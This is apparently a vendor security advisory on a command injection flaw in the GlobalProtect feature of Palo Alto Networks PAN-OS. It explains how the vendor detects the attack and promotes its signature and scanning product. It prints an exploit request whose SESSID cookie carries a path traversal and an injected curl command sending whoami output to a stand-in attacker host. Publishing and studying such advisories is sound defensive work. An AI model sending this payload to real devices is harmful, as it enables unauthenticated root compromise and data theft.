Appliances Details
PAN-OS is the software that runs all Palo Alto Networks next-generation firewalls.
Vulnerability
Palo Alto Networks PAN-OS could allow a remote attacker to execute arbitrary command on the system, caused by a command injection vulnerability in the GlobalProtect feature.
Identification
An attacker could exploit this vulnerability by sending an unauthenticated curl request to '/global-protect/login.esp'. By adding a specially crafted payload in the SESSID cookie it is possible to execute arbitrary code on the system with root privileges.
GET /global-protect/login.esp
Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/aaa`curl${IFS}attacker:4444?user=$(whoami)`
Detection
By turning this into a traffic file and matching rule, we are able to detect attempts to inject and execute arbitrary code on the system with root privileges. Thus, using the compromised devices to breach internal networks, steal data and credentials.
Coverage
Idappcom have created signature 8024845 along with a traffic file for this vulnerability.
References
Traffic IQ
If you are concerned that your business may be at risk of this vulnerability or others why not try out our Traffic IQ software which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional
Comentarios